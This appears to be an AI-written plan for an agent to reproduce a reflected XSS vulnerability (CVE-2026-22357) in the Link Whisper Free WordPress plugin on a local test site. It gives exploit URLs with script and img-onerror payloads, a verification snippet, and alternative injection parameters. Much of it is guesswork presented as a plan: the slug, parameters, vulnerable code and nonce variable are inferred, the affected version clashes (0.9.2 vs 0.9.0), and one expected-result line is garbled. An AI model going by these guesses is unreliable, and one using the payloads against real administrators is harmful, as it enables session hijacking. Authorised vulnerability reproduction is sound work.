Link Whisper Free <= 0.9.2 - Reflected Cross-Site Scripting

This research plan targets CVE-2026-22357, a reflected Cross-Site Scripting (XSS) vulnerability in the Link Whisper Free plugin (versions <= 0.9.0).

Since specific source files were not provided in the prompt, this plan is based on a structural analysis of the Link Whisper Free plugin's administrative interface and typical reflected XSS patterns in WordPress reporting tools.

---

1. Vulnerability Summary

The vulnerability exists because the Link Whisper Free plugin reflects user-controlled input from URL parameters back into the HTML response of the administrative dashboard without sufficient sanitization (e.g., sanitize_text_field) or context-aware output escaping (e.g., esc_html or esc_attr). An attacker can craft a malicious link that, when clicked by a logged-in administrator, executes arbitrary JavaScript in the context of the admin's session.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin.php
• Vulnerable Page (Slug): link-whisper or link-whisper-report (inferred).
• HTTP Parameter: keyword, category, or s (inferred). Reflected XSS often targets search/filter strings in reporting plugins.
• Authentication Level: Requires an active session of a user with access to the Link Whisper dashboard (typically Administrator).
• Precondition: The victim must be logged into WordPress and click the attacker-supplied URL.

3. Code Flow (Inferred)

1. Entry Point: The administrator visits a URL like wp-admin/admin.php?page=link-whisper-report&keyword=<script>alert(1)</script>.
2. Hook Registration: The plugin registers the admin menu via add_menu_page or add_submenu_page in a core initialization file (likely LinkWhisper.php or core/WpApp.php).
3. Controller Execution: The callback function for the menu slug (e.g., WpApp::show_report()) is triggered.
4. View Rendering: The controller retrieves the keyword parameter directly from $_GET['keyword'] to filter the internal link reports.
5. Sink: The plugin includes a view file (e.g., views/report.php) which echoes the search term back to the user to indicate what is being filtered:

   // Inferred vulnerable code in view file
   echo '<h2>Search results for: ' . $_GET['keyword'] . '</h2>';
   

6. XSS: Since $_GET['keyword'] is not wrapped in esc_html(), the script executes.

4. Nonce Acquisition Strategy

Reflected XSS in GET parameters for administrative pages typically does not require a nonce for the reflection to occur, as the page is designed to render based on URL state. However, if the plugin performs an action (like a search) that is nonce-protected, the script might still be reflected in the error or result message even if the nonce check fails.

Strategy for Extraction (if needed):

1. Identify Script Localization: Link Whisper often localizes data via wp_localize_script.
2. Creation: Create a page that triggers Link Whisper's scripts if they aren't global.
   • wp post create --post_type=page --post_status=publish --post_content='[link_whisper_suggestion_test]' (inferred shortcode).
3. Extraction:
   • Navigate to the created page.
   • browser_eval("window.wp_link_whisper?.nonce") (inferred JS variable).

Note: For this reflected XSS, we likely do not need a nonce to trigger the sink, as we are targeting the page rendering logic.

5. Exploitation Strategy

Step 1: Identify the Vulnerable Parameter

We will probe the common reporting parameters used by Link Whisper.

Request 1 (Probing):

• URL: http://localhost:8080/wp-admin/admin.php?page=link-whisper-report&keyword=XSS_PROBE_KEYWORD
• Method: GET
• Tool: http_request (with admin cookies)
• Check: Look for XSS_PROBE_KEYWORD in the response body.

Step 2: Deliver Payload

If the parameter is reflected, we inject the script.

Request 2 (Exploit):

• URL: http://localhost:8080/wp-admin/admin.php?page=link-whisper-report&keyword=%3Cscript%3Ealert(document.domain)%3C/script%3E
• Method: GET
• Tool: http_request (simulating a victim clicking the link)

6. Test Data Setup

1. Install Plugin: Ensure Link Whisper Free 0.9.0 is active.
2. Generate Content: Create 5-10 posts so the "Link Report" page has data to display/filter.
   • wp post generate --count=10
3. User Session: Ensure the automated agent is using an Administrator cookie session for the http_request.

7. Expected Results

• The HTTP response body will contain the raw string: ...search results for: <script>alert(document.domain)</script>....
• The script tag will NOT be escaped (e.g., not <script>).
• When viewed in a browser via browser_navigate, an alert box should appear.

8. Verification Steps

1. HTML Inspection: Use http_request and search the output for the unescaped payload.

   # Example logic for the agent
   response = http_request("...&keyword=<script>alert(1)</script>")
   if "<script>alert(1)</script>" in response.body:
       print("Vulnerability Confirmed: Unescaped reflection found.")
   

2. Browser Confirmation: Use browser_navigate to the exploit URL and check for an execution artifact (like a console log or alert).

9. Alternative Approaches

If the keyword parameter is sanitized, test these alternatives:

• order_by: admin.php?page=link-whisper-report&order_by=title"><script>alert(1)</script>
• category: admin.php?page=link-whisper-report&category=<img src=x onerror=alert(1)>
• msg: Many plugins use a msg or message parameter to display admin notices: admin.php?page=link-whisper&msg=<script>alert(1)</script>